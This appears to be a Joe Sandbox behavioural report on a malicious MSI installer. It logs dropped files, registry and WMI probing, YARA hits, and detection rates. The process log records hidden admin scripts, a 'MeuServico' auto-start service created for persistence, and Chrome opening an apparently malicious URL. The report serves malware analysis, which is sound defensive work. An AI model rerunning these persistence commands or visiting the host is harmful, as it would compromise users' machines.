            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49753 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: StarBurn.dll.1.drStatic PE information: section name: .?#3
            Source: StarBurn.dll.1.drStatic PE information: section name: .F~x
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory allocated: 777B0000 page read and write
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory allocated: 77160000 page read and write
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory allocated: 72430000 page read and write
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory allocated: 71910000 page read and write
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory allocated: 712C0000 page read and write
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory allocated: 707A0000 page read and write
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory allocated: 73BF0000 page read and write
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6450d8.msiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI55AB.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5723.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5762.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5783.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5820.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI594A.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5DCF.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5DEF.tmpJump to behavior
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI55AB.tmpJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B060783_2_00B06078
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00ADD0603_2_00ADD060
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B0B3363_2_00B0B336
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B146093_2_00B14609
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AF97303_2_00AF9730
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AFF7003_2_00AFF700
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B038A03_2_00B038A0
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B018EF3_2_00B018EF
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B0E9193_2_00B0E919
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AFFA8E3_2_00AFFA8E
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B0DB303_2_00B0DB30
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AE0E903_2_00AE0E90
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B160784_2_00B16078
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00AED0604_2_00AED060
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B1B3364_2_00B1B336
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B246094_2_00B24609
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B097304_2_00B09730
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B0F7004_2_00B0F700
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B138A04_2_00B138A0
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B118EF4_2_00B118EF
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B1E9194_2_00B1E919
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B0FA8E4_2_00B0FA8E
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B1DB304_2_00B1DB30
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00AF0E904_2_00AF0E90
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BBD9E05_2_00BBD9E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BA2AA05_2_00BA2AA0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BAA2CD5_2_00BAA2CD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BA5A345_2_00BA5A34
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BA9F4D5_2_00BA9F4D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00CBCC9A5_2_00CBCC9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00FB6BAC5_2_00FB6BAC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C2671016_2_00C26710
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B5A2CD16_2_00B5A2CD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C3741016_2_00C37410
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B946B016_2_00B946B0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B6D9E016_2_00B6D9E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B52AA016_2_00B52AA0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B55A3416_2_00B55A34
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C19F6C16_2_00C19F6C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B59F4D16_2_00B59F4D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_009AFD4016_2_009AFD40
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0097B5B816_2_0097B5B8
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C6CC9A16_2_00C6CC9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C83B8816_2_00C83B88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C7EB1C16_2_00C7EB1C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00D4719A16_2_00D4719A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00D4754916_2_00D47549
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0104024916_2_01040249
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0103F55016_2_0103F550
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0104078116_2_01040781
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_010417BC16_2_010417BC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0103F1DF16_2_0103F1DF
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0103F8EF16_2_0103F8EF
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_0092FD4017_2_0092FD40
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00BA671017_2_00BA6710
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00ADA2CD17_2_00ADA2CD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00BB741017_2_00BB7410
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00B146B017_2_00B146B0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00AED9E017_2_00AED9E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00AD2AA017_2_00AD2AA0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00AD5A3417_2_00AD5A34
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00B99F6C17_2_00B99F6C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00AD9F4D17_2_00AD9F4D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_008FB5B817_2_008FB5B8
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00C03B8817_2_00C03B88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00BFEB1C17_2_00BFEB1C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00BECC9A17_2_00BECC9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00FBF8EF17_2_00FBF8EF
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00FBF1DF17_2_00FBF1DF
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00FC17BC17_2_00FC17BC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00FC078117_2_00FC0781
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00FBF55017_2_00FBF550
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00FC024917_2_00FC0249
            Source: Joe Sandbox ViewDropped File: C:\Users\user\Pictures\fotosdaviagem\windows10.exe 585741CA3C4041BB39D107F1F159D908650967FBCCAC3A491BCA389CC4BA0769
            Source: Joe Sandbox ViewDropped File: C:\Windows\Installer\MSI55AB.tmp 42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: String function: 00BFC298 appears 36 times
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: String function: 00C7C298 appears 36 times
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: String function: 00AF8213 appears 100 times
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: String function: 00AF85D0 appears 39 times
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: String function: 00AF8246 appears 67 times
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: String function: 00B08213 appears 100 times
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: String function: 00B085D0 appears 39 times
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: String function: 00B08246 appears 67 times
            Source: StarBurn.dll.1.drStatic PE information: Number of sections : 13 > 10
            Source: CrzA2u67LQ.msiBinary or memory string: OriginalFilenameviewer.exeF vs CrzA2u67LQ.msi
            Source: CrzA2u67LQ.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs CrzA2u67LQ.msi
            Source: windows10.exe, 0000000C.00000002.2083044176.0000000001CF0000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: ^.VbP'
            Source: classification engineClassification label: mal40.evad.winMSI@60/37@6/8
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AD61D0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,3_2_00AD61D0
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AD6EE0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,LocalFree,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,3_2_00AD6EE0
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AD1D70 LoadResource,LockResource,SizeofResource,3_2_00AD1D70
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML5A2F.tmpJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI44f71.LOGJump to behavior
            Source: Yara matchFile source: 0000001A.00000002.4175519677.0000000000951000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.4174825409.00000000009A1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4175193752.0000000000981000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4175517301.0000000000911000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4174824901.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4164202689.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4177483806.0000000000971000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2046975605.00000000008D1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.4174481109.0000000000901000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4175775360.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Windows\Installer\MSI5DCF.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: CrzA2u67LQ.msiVirustotal: Detection: 26%
            Source: CrzA2u67LQ.msiReversingLabs: Detection: 31%
            Source: windows10.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exeString found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: windows10.exeString found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: windows10.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exeString found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: windows10.exeString found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\CrzA2u67LQ.msi"
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D52069831D98616EE51C5339C351C5F6
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5DCF.tmp "C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5DEF.tmp "C:\Windows\Installer\MSI5DEF.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe"
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\"
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start MeuServico
            Source: unknownProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe C:\Users\user\Pictures\fotosdaviagem\windows10.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://winrarbrasil.from-mn.com/clientes/inspecionando.php
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2224,i,6715851174139391298,17441490298513551426,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
